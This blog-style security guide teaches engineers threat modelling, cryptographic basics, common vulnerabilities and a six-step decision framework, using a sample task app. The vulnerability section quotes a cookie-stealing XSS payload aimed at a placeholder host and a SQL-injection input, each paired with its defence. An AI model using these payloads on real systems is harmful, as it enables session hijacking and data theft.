All articles

Article

Security from Zero to Hero — The Engineer's Guide to Thinking Like a Defender

Security is risk management, not paranoia. A practical roadmap covering the mental model, threat modelling, the building blocks (hashing, encryption, TLS, authentication, authorisation, secrets), the vulnerability catalogue (injection, XSS, CSRF, IDOR, SSRF), and a six-step decision framework you can run on every feature — anchored to one example app, TaskTrail.

Picture of the author
Mahmoud Albelbeisi
Published on
Security from Zero to Hero — build, strengthen, and scale secure applications with confidence

A note before section 1

TaskTrail — a small task-management web app with a mobile companion. Users sign up with email and password, create personal task lists, share lists with team members, attach files to tasks, and receive email and push notifications. There is a web frontend, a backend API, a Postgres database, an object store for attachments, a small operations team, and a handful of third-party SDKs. We'll return to TaskTrail in every section so the reader watches one app's threat model grow and its defences harden as concepts stack. TaskTrail is not a payment app, not a healthcare app, not a messaging app — it is a normal everyday product, the kind most engineers actually ship.


1. The Mental Model — Security Is Risk Management

Security is the work of choosing which risks you accept and which you defend against, given finite engineering time. There is no such thing as "100% secure." Anyone who tells you otherwise is selling something.

Three numbers sit behind every decision:

  • Likelihood — how often this attack is tried, in your context.
  • Impact — how bad it is if the attack lands.
  • Cost of defence — engineering time plus drag on the product.

If the cost of defence is bigger than the loss it prevents, the defence is security theatre (a control that looks like security but does not measurably reduce risk). Take it out.

CIA — the three things you protect

The CIA triad (Confidentiality, Integrity, Availability — the three core security properties) is the shortest model in the field.

  • Confidentiality — only the right people see the data.
  • Integrity — the data has not been changed without authorisation.
  • Availability — the system answers when needed.

Most decisions are about which of these matters most for this asset. A bank's vault is mostly confidentiality + integrity. A 911 line is mostly availability. An audit log is mostly integrity. TaskTrail's task contents are confidentiality first, integrity second, availability third.

Think of it like… locks on a building. A vault keeps determined thieves out (confidentiality). Tamper-evident seals on packages prove nobody opened them (integrity). A 24-hour reception desk means someone is always there (availability). Different locks for different jobs.

In software, this looks like… TaskTrail encrypts attachments at rest (C), signs API responses with HMAC for integrity (I), and runs the API in two regions (A). Three properties, three controls.

The myth: "the security team handles it"

The security team helps. They do not replace you. Every engineer ships security with every line of code. A senior security engineer can spot the missing authorisation check in your PR; they cannot rewrite every line of every product team's code.

"Security is not a feature you add. It is a property your design either has or fails to have."

Every concrete decision sits downstream of these seven inputs. Without them, you are guessing.


2. The Trade-Off Axes

Each axis is a slider, not a switch. Every push has a price.

Confidentiality vs availability

You can lock something so hard that legitimate users cannot reach it during a failure. TaskTrail could encrypt every attachment with a key from a separate key-server. If the key-server has an outage, attachments become unreadable — even to the rightful owners.

Security vs usability

Every prompt, every check, every step costs the user. Bad security UX creates bad security: people write down passwords, share MFA codes by SMS, click through warnings. The most common phishing message of 2024 was "your MFA push expired — please approve again."

Strict vs flexible authorisation

Fine-grained access control (per-row, per-field) is safer but harder to operate. Coarse-grained (per-resource type) is easier to reason about but leaks more on a breach. Pick the level that matches the asset.

Cost (visible and invisible)

The password-reset queue is a security cost. Help-desk tickets are a security cost. Engineer hours retraining users on a new flow are a security cost. Real cost is rarely just the line of code.

Compliance vs engineering judgement

Sometimes regulators demand a control that is weaker than what you would design. Meet the rule. Then add the better thing on top. Compliance is a floor, not a ceiling.

If you push toward…You pay in…A TaskTrail example
Confidentialityavailabilityencrypted attachments unreachable on key-server outage
Strong authenticationusabilitypasskey enrolment friction loses 5% of new sign-ups
Strict authorisationoperabilityper-row checks complicate every read query
Visible defencesengineer hoursrate-limit + WAF + audit log all need maintenance
Compliance onlyreal safety"we're SOC 2" does not mean "we're hard to breach"

The chart says one thing: many "classic" controls (security questions, mandatory rotation) are theatre. Many cheap controls (passkeys, argon2, rate limiting) are real.

Don't confuse with… Compliance is "did we tick the boxes the auditor cares about?" Security is "are we actually protected?" The two overlap, but neither implies the other.


3. The Threat Model — Who, What, How

A threat model (a short written list of what you protect, who attacks, and how) is the shortest path from "we should do security" to a useful answer. Most engineers carry one in their head and never write it down. That is the bug.

Walk through TaskTrail's threat model with me. Four blocks: assets, attackers, attack surface, then the output table.

3.1 Assets — what attackers want

An asset (anything of value the attacker is after) for TaskTrail:

  • User credentials — email + password hashes; the keys to every other asset.
  • Session tokens — bearer access without the password.
  • Email-address list — gold for phishing the user base.
  • Private task contents — the user's actual data.
  • Attached files — sometimes the most sensitive content (NDAs, photos).
  • Employee admin credentials — one breach equals all-data access.
  • API keys to the email-sending vendor — outbound abuse and reputation damage.

Money, identity, graph, and access. TaskTrail has all four in some form.

3.2 Attackers — named archetypes

A threat actor (any person or system trying to take an asset) is not a faceless hacker in a hoodie. It is one of these archetypes:

  • Opportunistic credential stuffer — runs leaked password lists against the login form. Not targeting you — targeting anyone. Massive scale, low effort.
  • Curious insider — engineer with database access browsing other people's tasks.
  • Targeted phisher — wants one specific user's account, willing to send a tailored email.
  • Compromised dependency — an npm package added to TaskTrail's frontend updates with malicious code that exfiltrates session cookies.
  • State-level adversary — almost certainly not TaskTrail's threat model. Naming this archetype lets you explicitly exclude it. You do not defend against everything — you defend against what fits the asset.

Don't confuse with… A threat is the possibility of an attack. A threat actor is who would do it. A vulnerability is a flaw that lets them succeed. Risk is likelihood × impact. Four words, four meanings.

3.3 Attack surface — every door in the house

The attack surface (every place untrusted input meets the system) is the door list. For TaskTrail:

  • The login form (and rate limiter).
  • The registration form.
  • The password reset flow.
  • Every API endpoint.
  • The file upload path.
  • The share-list link (publicly addressable).
  • Inbound email webhooks.
  • Third-party SDKs in the frontend and backend.
  • Mobile push registration (and the push topic).
  • The admin console.

Each entry is one door. Each door deserves one thought: who can knock, and what happens when they do?

3.4 The output — a one-page table

Quick preview before the diagrams: attack surface, threat actor, likelihood, impact, defence, residual risk are all defined in the paragraphs above.

This is the deliverable. One row per realistic attack:

AssetAttackerAttackLikelihoodImpactDefenceResidual
CredentialsCredential stufferReuse leaked passwords on /loginHighHighargon2 + rate limit + MFA + breach-list checkA few users with reused passwords still vulnerable
Session tokenCompromised npm packageExfiltrate cookies to attacker domainMediumHighSRI on scripts; CSP; cookies HttpOnly+SameSiteNew SDKs need a fresh review
Task contentsCurious insiderRun SELECT * FROM tasksMediumMediumLeast-privilege DB roles; audit log; alertsAn admin with read access still has read access
AttachmentsTargeted phisherPhish owner, then downloadMediumHighMFA on sensitive actions; download alertsPhish-proof requires passkeys

After this section, you should be able to fill one in for your own product.

Real situation: TaskTrail's first threat-model meeting fits on a single page. Two hours of arguing in a room. The output is the cheapest piece of paper the team will ever produce — every later decision lands faster because of it.


4. The Building Blocks

Cheat-sheet style. Each block follows the Examples Rule — definition, analogy, TaskTrail example, why it matters — plus Use it when / Skip it when / You pay, a Real situation, and a Common tools line.

4.1 Hashing

A hash function (a one-way function that maps any input to a fixed-size output) is used for integrity (proving a value has not changed) and for password hashing (storing passwords without storing the password itself).

Think of it like… running a document through a shredder that always produces the same pattern of confetti for the same document. You cannot reassemble the document, but two identical documents make identical confetti.

In software, this looks like… TaskTrail stores argon2(password + salt) in the users table. On login, it hashes the submitted password with the same salt and compares.

Generic hashes (SHA-256) are fast — good for integrity, bad for passwords. Password hashing uses slow, memory-hard algorithms on purpose: bcrypt, scrypt, argon2.

A salt (a random per-user value mixed into the password before hashing) defeats rainbow tables. A pepper (a global secret mixed in addition to the salt) defeats theft of the database alone — useful, never a substitute for proper hashing.

Don't confuse with… Hashing is irreversible. Encryption is reversible with the key. Encoding (Base64, URL-encoding) is just a representation — not security at all.

  • Use it when storing passwords, verifying file integrity, deduplicating content.
  • Skip it when you need to recover the original (use encryption).
  • You pay the slow-on-purpose cost (~100ms per login attempt).

Real situation: LinkedIn 2012 stored 117M passwords as unsalted SHA-1. The dump leaked, and most were cracked within days. Argon2 + salt would have made the same dump nearly worthless.

Common tools: bcrypt (battle-tested default), argon2 (modern winner, recommended for new systems), scrypt (memory-hard alternative).

4.2 Symmetric encryption

Symmetric encryption (same key encrypts and decrypts) is the workhorse. The modern default is AES-GCM (AES with Galois/Counter Mode — encryption + tamper detection in one step). AEAD (Authenticated Encryption with Associated Data) is the property that matters: ciphertext that has been tampered with fails to decrypt.

Think of it like… a lockbox where the same key opens and closes it. Anyone with the key can read or write.

In software, this looks like… TaskTrail encrypts attachments at rest with AES-GCM. The data key is wrapped by a key-management service.

A nonce (a number used once) and an initialisation vector (IV) (a per-message random or counter value) must never repeat for the same key. Repeating them in AES-GCM is catastrophic.

  • Use it when you control both ends (data at rest, internal pipes).
  • Skip it when parties do not share a key (use asymmetric).
  • You pay key management — distributing, rotating, revoking.

Common tools: libsodium / NaCl (opinionated, hard to misuse), OpenSSL (ubiquitous, footgun-prone), language-native (Apple CryptoKit, Java JCA, Python cryptography, Go crypto/...).

4.3 Asymmetric encryption and digital signatures

Asymmetric encryption (one key encrypts, a different key decrypts — public + private) powers TLS, JWT signing, and code signing.

A digital signature (a value computed with the private key that anyone with the public key can verify) proves who sent something without hiding what they sent. Public Key Infrastructure (PKI) (the system of certificates and authorities that ties public keys to identities) is how the web trusts public keys.

Don't confuse with… Signing proves who. Encrypting hides what. The two are different goals; many protocols combine them.

Common tools: OpenSSL, libsodium, language-native crypto, Let's Encrypt (free certificate authority).

4.4 TLS — the green lock

Transport Layer Security (TLS) (the standard protocol that encrypts and authenticates network traffic) gives you three things: transport confidentiality, transport integrity, and server authentication. It does not give you anything about how the server handles the data after decrypting it.

Think of it like… a sealed envelope between two post offices that already trust each other's stamps. Inside the building, the letter is a normal piece of paper.

In software, this looks like… TaskTrail's API runs only over https://. Plaintext requests are refused at the edge.

Certificate pinning (refusing any TLS certificate the client was not built to trust) is an extra layer for high-value mobile apps. Trade-off: a forgotten rotation locks every user out.

Common tools: NGINX, Caddy (automatic HTTPS via Let's Encrypt), Cloudflare (edge TLS), AWS ACM (managed certificates), Let's Encrypt (free CA).

4.5 Authentication primitives

Authentication (authn) (proving who you are) uses one or more factors: something you know (password), something you have (phone, security key), something you are (biometric).

Multi-factor authentication (MFA) (requiring more than one factor) dramatically reduces account takeover. Two-factor authentication (2FA) is MFA with exactly two factors — the names are interchangeable in practice.

Ranked from worst to best:

  • SMS one-time-password — vulnerable to SIM swap (an attacker convinces the carrier to move the phone number to their SIM). Common, weakest.
  • TOTP (time-based one-time password) (a 6-digit code from an authenticator app, refreshing every 30 seconds) — phishable, but no SIM-swap risk.
  • Push approval — better UX, vulnerable to push-fatigue (user taps "approve" on the wrong prompt).
  • Hardware security key / WebAuthn / passkeys — phishing-resistant. The future.

Don't confuse with… Authentication is "who are you?". Authorisation is "what may you do?". Different questions, different answers, different code paths.

4.6 Authorisation models

Role-Based Access Control (RBAC) (permissions attached to roles; users get roles) is simple. Attribute-Based Access Control (ABAC) (decisions made on attributes — user, resource, time, context) is fine-grained but harder to operate.

TaskTrail's first version was RBAC: owner, member, admin. The third enterprise customer needed "view but not export" — that pushed it toward ABAC for the export-permission attribute.

4.7 Sessions and tokens

A session (server-side state that lets the client skip re-authentication for a while) is the simple safe default. The client holds a session id (in a cookie); the server holds the rest.

A token (a string that proves the bearer has permission) comes in three shapes:

  • access token — short-lived (minutes), used in every API call.
  • refresh token — long-lived, exchanged for new access tokens.
  • id_token — proves identity (used for sign-in).

A JSON Web Token (JWT) (a signed token containing claims) is one widely-used format. JWTs are stateless (great for scale) and irrevocable until expiry (terrible for "log out everywhere"). Pick the trade-off knowingly.

OAuth 2.0 (an authorisation protocol that issues short-lived tokens after a login) and OpenID Connect (OIDC) (a thin identity layer on top of OAuth 2.0) are the standards for third-party identity.

Don't confuse with… A cookie is a transport (browser-stored value sent with every request). A JWT is a format (signed claims). You can put a JWT in a cookie. You can put a session id in a cookie. They are not the same thing.

4.8 Secrets management

A secret (a value that grants access — API key, password, token, signing key) must never live in source control. Use a vault. Inject at boot via env var. Rotate on a schedule. Least-privilege the vault itself.

Real situation: Uber 2016 had AWS keys in a private GitHub repo. An attacker found them in a forked branch, downloaded data on 57 million users, and the company paid the attacker to keep quiet — adding a cover-up to the original mistake.

Common tools: HashiCorp Vault (open-source standard), AWS Secrets Manager, GCP Secret Manager, Doppler / Infisical (developer-friendly SaaS), 1Password Secrets Automation.

4.9 Logging and audit

What to log: who did what, when, from where, with what result. What not to log: passwords, tokens, full request bodies, personally identifiable information (PII) (names, emails, IDs that can be tied to a real person).

Audit logs are a security control: detection (you can see the breach) plus accountability (you know who did it). Send them somewhere the application cannot rewrite.

  • Use it when any change touches identity, money, or data classification.
  • Skip it when events are pure debug noise.
  • You pay storage and the discipline of redacting at the source.

Common tools: Datadog / New Relic (SaaS observability), ELK / OpenSearch (self-hosted), Loki (logs by Grafana Labs).

4.10 Backup and recovery

Availability lives here. Encrypted, offline copies; tested restores; a documented runbook. A backup you have not restored is a fairy tale.

4.11 Rate limiting and abuse prevention

Protects login, password reset, file upload, and any expensive operation. Per-IP, per-user, per-email — composed. CAPTCHAs are a last resort; they cost legitimate users.

Common tools: Cloudflare Rate Limiting, AWS WAF, application-level libraries.

Don't confuse with… Hashing is irreversible (used for integrity and passwords). Encryption is reversible (used for confidentiality). Encoding (Base64, URL-encoding) is not security at all.


5. The Vulnerability Catalogue

A teaching catalogue, not an exhaustive OWASP dump. For each: What it is, How attackers get in, How to defend (ranked from "the right fix" to "the band-aid"), with a real named case.

5.1 Injection (SQL, command, LDAP)

What it is. Injection (an attacker's input is mixed with code/queries on a trust boundary) — string concatenation across a trust boundary. The classic: "SELECT * FROM tasks WHERE title LIKE '" + input + "'".

How attackers get in. Submit input that closes the quote and adds a clause: ' OR 1=1 --. The query returns everything.

How to defend. Right fix: parameterised queries (the database treats input as data, never as code). Band-aid: input filtering — fragile and bypassable.

Now parameterised:

cur.execute("SELECT * FROM tasks WHERE title LIKE %s", (input,))
# input is a value; the DB never sees SQL

Real situation: MOVEit 2023 (CVE-2023-34362) was a SQL-injection zero-day that led to mass data theft from hundreds of organisations.

5.2 Cross-Site Scripting (XSS)

What it is. XSS (Cross-Site Scripting) (attacker-controlled content is rendered as code in another user's browser) — the malicious page steals cookies or impersonates the user.

How attackers get in. A user pastes <script>fetch('//evil/?c='+document.cookie)</script> as a task title. Another user opens the list. Their browser runs the script.

How to defend. Right fix: contextual output encoding (the templating engine escapes < to &lt; automatically) plus a strict Content Security Policy (CSP) (an HTTP header that limits what scripts a page can run). Band-aid: input filtering — bypassable.

With CSP default-src 'self', the inline script does not run.

5.3 Cross-Site Request Forgery (CSRF)

What it is. CSRF (the user's browser is tricked into sending an authenticated request) — the user is logged in to TaskTrail; an attacker page submits a form that POSTs to TaskTrail; the cookie rides along.

How to defend. SameSite=Lax cookies (default in modern browsers) plus an anti-CSRF token (a per-session token the form must include) on state-changing requests.

5.4 Broken access control / IDOR

What it is. Insecure Direct Object Reference (IDOR) (an endpoint returns or modifies an object based on a parameter without checking ownership). /api/tasks/42 returns task 42 even if it isn't yours.

How attackers get in. Log in. Increment IDs. Read other users' tasks.

How to defend. Authorise on every read, not just on routes. Check ownership at the row level, in the SQL query, every time.

5.5 Server-Side Request Forgery (SSRF)

What it is. SSRF (the server is tricked into fetching an attacker-controlled URL) — usually pointed at internal-only services that trust the internal network.

Real situation: Capital One 2019 — an SSRF via a misconfigured WAF let an attacker reach an internal AWS metadata endpoint, steal credentials, and download data on 100 million customers.

How to defend. Allow-list outbound URLs at the application layer. Block requests to 169.254.169.254 (cloud metadata) and localhost. Use IMDSv2 on AWS.

5.6 Broken authentication

What it is. Weak password rules, no rate limit on login, predictable session IDs, missing MFA on sensitive actions.

How to defend. argon2 + per-IP and per-account rate limit + MFA for sensitive actions + session IDs from a CSPRNG (cryptographically secure random number generator) + breach-list check at password set time.

5.7 Sensitive data exposure

What it is. Secrets in logs, PII in URLs (which end up in proxy logs, browser history, referer headers), passwords sent over plaintext, generic encryption-at-rest claims that do not actually protect against the threat.

How to defend. Redact at the source. TLS everywhere. Classify data; design controls per class.

5.8 Security misconfiguration

What it is. Default credentials, open S3 buckets, debug endpoints in production, verbose error messages.

Real situation: Year after year, "open S3 bucket" stories keep appearing. The defaults are now safer (private by default), but legacy buckets and bad re-enablements still cause regular breaches.

5.9 Vulnerable / outdated components & supply-chain attacks

What it is. Using a dependency with a known CVE (Common Vulnerabilities and Exposures) (a public catalogue of known security flaws, each with a unique id), or worse, a malicious dependency.

Real situation: SolarWinds 2020 — attackers compromised the Orion software build system; signed updates carried a backdoor to ~18,000 customers including US government agencies. The 2018 event-stream npm incident showed the same shape at smaller scale: a popular package handed off to a new maintainer, who inserted a credential stealer.

How to defend. Pin versions. Use Software Bill of Materials (SBOM) (a manifest of all dependencies and their versions). Run dependency scanners on every PR. Watch the NVD and GitHub Advisory Database.

Common tools: Dependabot (GitHub-native), Renovate (open-source, configurable), Snyk Open Source, OSV-Scanner (Google, free).

5.10 Insecure deserialisation

What it is. Feeding attacker-controlled bytes to a deserialiser that constructs objects (Java's ObjectInputStream, Python's pickle, .NET's BinaryFormatter). The wrong type can run code.

How to defend. Do not deserialise untrusted input. Use safe formats (JSON without polymorphic types).

5.11 Sensitive secret in source control

What it is. API keys, passwords, signing keys committed to git.

Real situation: Uber 2016 — AWS keys in a private GitHub repo accessed via a leaked engineer credential. 57M user records exfiltrated. The cover-up made it worse.

How to defend. Pre-commit secret scanners (git-secrets, gitleaks, trufflehog). A vault for runtime secrets. Rotate immediately when you find one — even after deletion, the value remains in git history forever.

Don't confuse with… A vulnerability is a flaw. A threat is the possibility of exploitation. A risk is likelihood × impact. An incident is what happens when the risk lands. A breach is an incident with confirmed data loss.


6. Security Postures — Archetypes for How Much Effort to Spend

"How much security is enough?" is the wrong question. Better: which posture (an overall stance about how much you trust the network, the device, and the user) fits this product, this stage, this market? Five postures cover most apps.

6.1 Minimum viable security

The shape: TLS, hashed passwords, parameterised queries, secrets out of source control, rate-limited login.

  • Wins when the product is early; the user's exposure is small.
  • Hurts when real money or real PII flows; users notice the gaps.
  • Real example: most early-stage SaaS until traction proves out.
  • TaskTrail stage: MVP with the first 1,000 users.
  • Common tools: TLS via Caddy or Cloudflare, argon2, Dependabot at the minimum.

6.2 Defence in depth

Defence in depth (layering multiple controls so any one failure does not breach the asset) — assume any one defence will fail. Add the next one anyway.

  • Wins when assets are valuable enough that one bug should not be the whole story.
  • Hurts when the team is too small to maintain layers without rotting them.
  • Real example: 1Password stacks Secret Key + master password + AEAD + audited E2EE backups. Cloudflare layers DDoS, WAF, rate-limit, and origin protection.
  • TaskTrail stage: once the first enterprise customer signs up.
  • Common tools: WAF + TLS + app-level authorisation + row-level checks + encrypted DB + audit log.

6.3 Zero trust

Zero trust (every request is suspect, even from inside the network) — identity-aware access at every hop, no "internal-only" implicit trust.

  • Wins when there are employees with access to production data; insiders are part of the model.
  • Hurts when the team has no identity infrastructure yet.
  • Real example: Google's BeyondCorp is the canonical write-up; modern cloud-native shops follow the pattern.
  • TaskTrail stage: once there is an admin console with employee access to user data.
  • Common tools: identity provider (Auth0, Okta, Keycloak), mTLS between services, short-lived credentials.

6.4 Compliance-driven

The shape: meet the controls and audits regulators demand — GDPR, SOC 2, PCI DSS, HIPAA.

  • Wins when you sell to regulated buyers; without the badge, you cannot close the deal.
  • Hurts when the team treats the floor as the ceiling.
  • Real example: every SaaS with an enterprise sales motion.
  • TaskTrail stage: when sales starts mentioning SOC 2 in pre-sales calls.

GDPR (one paragraph): if you serve EU users, you process personal data lawfully, minimally, and let users see and delete their data. Privacy-by-design changes engineering choices: every database column for PII gets a deletion plan.

SOC 2 (one paragraph): a US-origin attestation report on operational controls. Useful for B2B sales. Does not directly improve security; the operational discipline that produces it sometimes does.

PCI DSS (one paragraph): if you touch card-holder data. Most teams reduce scope by routing payments through a vendor (Stripe, Adyen) so card numbers never touch their systems.

HIPAA (one paragraph): if you handle US health data. Strict rules on who can access PHI, audit logging, and breach notification.

6.5 End-to-end encryption (E2EE)

E2EE (End-to-End Encryption) (only the sender's and recipient's devices can read content; the server only sees ciphertext) — the server is part of the threat model.

  • Wins when content secrecy matters more than features.
  • Hurts when you need search, server-side rules, or recovery — all become hard or impossible.
  • Real example: Signal, WhatsApp (Signal Protocol since 2016), iMessage.
  • TaskTrail stage: probably never. E2EE is wrong for collaborative editing; the recovery story is brutal.

For TaskTrail, defence in depth dominates. E2EE is wrong for the use case. Compliance comes when sales demands it.


7. The Decision Framework

The repeatable procedure. Run it every time you design or review a feature. Six steps, because six fits in the head.

  1. Name the asset. What is being protected? (Credentials, private content, attachments, share tokens.)
  2. Name the attackers. Pick from the archetypes in § 3.
  3. Map the attack surface. What inputs and channels does this feature add?
  4. Pick the dominant risk. The one that ends the product (not just the feature).
  5. Choose the smallest defence that closes it. Reach for known primitives first. If you are inventing crypto, you are doing it wrong.
  6. Decide what residual risk you accept. Write it down. Revisit when the model changes.

Worked example: TaskTrail's Share a List

The product asks: a user shares a list. The recipient gets a link. The recipient may not have an account.

  1. Asset. The shared list's contents and the share token itself.
  2. Attackers. Opportunistic: someone guesses or scrapes share links. Targeted: a phisher tricks a recipient. Insider: an employee opens the share log.
  3. Attack surface. A new public endpoint (the share URL); a new email going out; a new database row (the share row).
  4. Dominant risk. A guessable or leaked share link grants list access without authentication.
  5. Smallest defence that closes it.
    • Share tokens are 256-bit random (cryptographically unguessable).
    • Tokens are single-use or time-limited (7 days).
    • Tokens are revocable from the owner's UI.
    • The token is in the URL fragment (#), not the path — keeps it out of HTTP referer logs.
    • Server validates: signature ok, not revoked, not expired.
    • Recipient sees a read-only scoped view. No edits without sign-in.
  6. Residual risk we accept.
    • A recipient can copy the contents. The share is not a DRM system.
    • A recipient who forwards the link gives access to whoever they forward to. We accept this; we surface "n people accessed this link" to the owner.

The framework forces one decision: 256-bit single-use revocable tokens. It explicitly leaves another: forwarding. We are not in the DRM business.

"The framework's job is not to eliminate risk. It is to make every accepted risk a written, deliberate one."


8. Three More Worked Examples

8.1 Login flow

Registration: argon2id with sensible parameters; a breach-list check (HaveIBeenPwned k-anonymity API or local list). Login: per-IP and per-account rate limit; argon2 compare; session cookie with HttpOnly; Secure; SameSite=Lax. Sensitive actions (delete account, change email, export data): MFA prompt even if the session is fresh.

What the framework forces: MFA enrolment is friction; do not gate every login on it. Gate on risk — new device, new IP geolocation, sensitive action.

8.2 File upload (TaskTrail attachments)

Threats: malware, oversize files, MIME-type spoofing, path traversal (attacker uses ../ in a filename to escape the upload directory), SSRF if URLs are followed.

Defences: virus scan in a sandbox; content-type and size limits on the way in; randomised stored filenames (never the user-supplied name on disk); strict allow-list of accepted MIME types; serve attachments from a separate domain so a malicious file cannot read TaskTrail's cookies.

8.3 API endpoint with auth

Shape: GET /api/tasks/{id}. Threats: IDOR (no ownership check), mass assignment ({"role": "admin"} accepted by an auto-binder), missing rate limit, verbose errors leaking schema.

Defences: row-level authorisation; explicit allow-list of fields (DTO with explicit schema); rate limit per user; generic error messages.

Don't confuse with… Authentication answers who. Authorisation answers what may you do. The login check is authn; the ownership check is authz. Different bugs, different fixes.


9. Anti-Patterns and Common Traps

"We'll harden it later." Security debt compounds. Later usually means after the breach. Fix: run the threat model now. An hour today saves a year of pain.

Storing passwords with MD5 / SHA-1 / SHA-256. Generic hashes are wrong for passwords. Fix: argon2id with sensible parameters.

Hardcoded secrets in source control. Anything in git history is forever. Fix: secrets manager + pre-commit scanner + immediate rotation when found. Real situation: Uber 2016.

Custom crypto. "We rolled our own AES wrapper" introduces a bug nobody can find. Fix: a well-audited library — libsodium, the language's modern stdlib.

Trusting client-side validation for authorisation. The client is the attacker's territory. Fix: re-check on the server, every time. Disabling a button does nothing.

Mandatory password rotation every 90 days. Empirically increases password reuse and theatre passwords. NIST SP 800-63 recommends against it. Fix: rotate on suspicion of compromise; require length and a breach-list check at change time.

Security questions ("mother's maiden name"). Public information. Fix: use only as a break-glass fallback; never as a primary factor.

SMS-based MFA as the only MFA option. SIM swap is a real attack. Fix: offer TOTP and passkeys. Allow SMS only as accessibility fallback.

Mass assignment in API frameworks. Accepting {"role": "admin"} because the framework auto-binds. Fix: explicit allow-list of fields (DTO / serializer with explicit fields).

Trusting authenticated identity for authorisation. "They are logged in, so they can do this." No — who they are decides what they can do. Fix: separate authn and authz; check ownership at the row level.

Logging full request bodies, query strings, or stack traces in production. Captures secrets, tokens, PII. Fix: structured logging with redaction at the source.

Verbose error messages. "Username does not exist" leaks an account-enumeration oracle. Fix: generic "invalid credentials" for both wrong-username and wrong-password.

Disabling security headers because "CSP breaks our site." That is the wrong fix. Fix: tighten CSP gradually — start report-only, fix violations, then enforce.

One CI key with admin access to everything. Lost CI key = lost everything. Fix: scoped, short-lived credentials per pipeline.

Failing open instead of closed. When a check errors, the wrong default is "let it through." Fix: every error path on a sensitive action ends in deny — fail closed.

No incident plan. When something happens, you panic. Fix: a written runbook, a contact tree, an annual tabletop exercise. The first hour of an incident is when good plans pay for themselves.

"Theatre is expensive and useless. Real defence is cheap and quiet. Pick the second."


10. When to Tackle Security — Triggers

Security work is not a quarterly sprint. It is a set of triggers in your normal flow. When any of these fire, do the threat-model pass before you ship.

  • Adding a new third-party dependency. Read the package's recent activity, owners, history. Pin the version. Add it to dependency scanning. TaskTrail example: a new analytics SDK could phone home with the user's session id.
  • Adding a new entry point. A new public endpoint, a new webhook, a new email-driven action, a new file upload, a new mobile deep link. Each is fresh attack surface.
  • Touching auth, session, or token code. Any change here multiplies risk. Slow down. Add an extra reviewer.
  • Storing a new piece of data. Ask: what is the classification — public, private, sensitive, secret? before writing the row. TaskTrail example: if you start storing IP addresses, GDPR may now apply.
  • Sending data to a new endpoint. Ask: is this in scope of our threat model? What is the minimum we need to send?
  • Onboarding a new market or customer segment. Different threat models. SIM swap is huge in some regions; GDPR kicks in for EU users; HIPAA if you receive any health data; PCI if you touch card numbers.
  • Hiring a contractor or granting a new access role. Every new principal is a new key-holder. Provision least-privilege; deprovision the day they leave.
  • A bug bounty / pen-test report lands. Every report — even "low" — is free threat-model data. Real situation: most large breaches are foreshadowed by a bounty report someone closed too fast.
  • Before any major launch. A short pre-launch security review with a checklist beats finding the bug post-launch.
  • After any incident. The postmortem must produce at least one structural change, not just "we'll be more careful next time."

"If the change touches an asset from your threat model, you tackle security now."


11. What to Read Next

A short list. One sentence per item on what you will gain.

  1. OWASP Top 10 — the canonical taxonomy of common application vulnerabilities; updated every few years. Read the current edition.
  2. OWASP Application Security Verification Standard (ASVS) — a leveled checklist (L1, L2, L3) that tells you what "secure" means for your application class.
  3. Threat Modeling: Designing for Security by Adam Shostack — the textbook on the discipline.
  4. The Tangled Web by Michał Zalewski — old, still the clearest book on browser/web threat models.
  5. Cryptography Engineering by Ferguson, Schneier, Kohno — the right level for engineers; teaches how to use crypto, not how to invent it.
  6. Google's BeyondCorp papers — the original argument for zero trust, written from the inside.
  7. NIST SP 800-63 Digital Identity Guidelines — the modern source of truth on passwords, MFA, and identity. Quietly contradicts a lot of old conventional wisdom (rotation, complexity rules).
  8. Incident postmortems from Cloudflare, GitLab, Stripe, Fly.io — reading real incidents teaches more than any book. They are short, honest, and free.

12. Glossary

  • AEAD (Authenticated Encryption with Associated Data) — encryption plus tamper detection in one step.
  • Argon2 — modern password-hashing winner; recommended for new systems.
  • Asset — anything of value the attacker is after.
  • Asymmetric encryption — one key encrypts, a different key decrypts (public + private).
  • Attack surface — every place untrusted input meets the system.
  • Attacker / threat actor — any person or system trying to take an asset.
  • Audit log — append-only record of who did what, when, with what result.
  • Authentication (authn) — proving who you are.
  • Authorisation (authz) — proving what you may do.
  • Availability — the system answers when needed.
  • AWS Secrets Manager — backend secrets store on AWS.
  • Bcrypt — battle-tested password-hashing default.
  • Breach — incident with confirmed data loss.
  • Bug bounty — paid programme that rewards external researchers for reports.
  • Certificate — cryptographic identity document tied to a domain or principal.
  • Certificate Authority (CA) — entity that issues and signs certificates.
  • CIA triad — Confidentiality, Integrity, Availability.
  • Cloudflare — edge network; well-handled incidents and transparent postmortems.
  • CodeQL — GitHub's deep static-analysis engine.
  • Compliance — meeting controls auditors care about (GDPR, SOC 2, PCI DSS, HIPAA).
  • Confidentiality — only the right people see the data.
  • Cookie — browser-stored value sent with every request.
  • CSP (Content Security Policy) — HTTP header that limits what scripts a page can run.
  • CSRF (Cross-Site Request Forgery) — the user's browser is tricked into sending an authenticated request.
  • CVE (Common Vulnerabilities and Exposures) — a public catalogue of known security flaws, each with a unique id.
  • CVSS (Common Vulnerability Scoring System) — a scoring scheme from 0–10 for CVE severity.
  • Datadog — SaaS observability platform.
  • Defence in depth — layering multiple controls so any one failure does not breach the asset.
  • Dependabot — GitHub-native dependency scanner.
  • Digital signature — value computed with a private key that anyone with the public key can verify.
  • Doppler / Infisical — developer-friendly SaaS secrets managers.
  • E2EE (End-to-End Encryption) — only sender and recipient can read content.
  • Encoding — reversible representation (Base64, URL-encoding); not security.
  • Encryption — reversible transformation requiring a key.
  • Equifax 2017 — unpatched Apache Struts → 147M records.
  • Exploit — code or technique that leverages a vulnerability.
  • Fail closed — when a check errors, deny by default.
  • Fail open — when a check errors, allow by default. (Wrong for sensitive actions.)
  • GCP Secret Manager — backend secrets store on Google Cloud.
  • GDPR — EU regulation on personal-data processing.
  • HackerOne — major bug bounty platform.
  • Hash function — a one-way function that maps any input to a fixed-size output.
  • HashiCorp Vault — open-source secrets-management standard.
  • HIPAA — US regulation on health data.
  • IDOR (Insecure Direct Object Reference) — endpoint returns/modifies an object without ownership check.
  • Identity provider (IdP) — system that authenticates users for many apps.
  • Impact — how bad the outcome is if an attack lands.
  • Incident — a security event with potential or actual harm.
  • Incident response (IR) — process for handling incidents.
  • Initialisation vector (IV) — per-message value used in encryption; never repeat with the same key.
  • Integrity — data has not been changed without authorisation.
  • Injection — attacker input mixed with code/queries on a trust boundary.
  • JSON Web Token (JWT) — signed token containing claims.
  • Key derivation function (KDF) — function that derives a key from a password or other input.
  • Key rotation — replacing a key on a schedule or after compromise.
  • Keycloak — open-source identity provider.
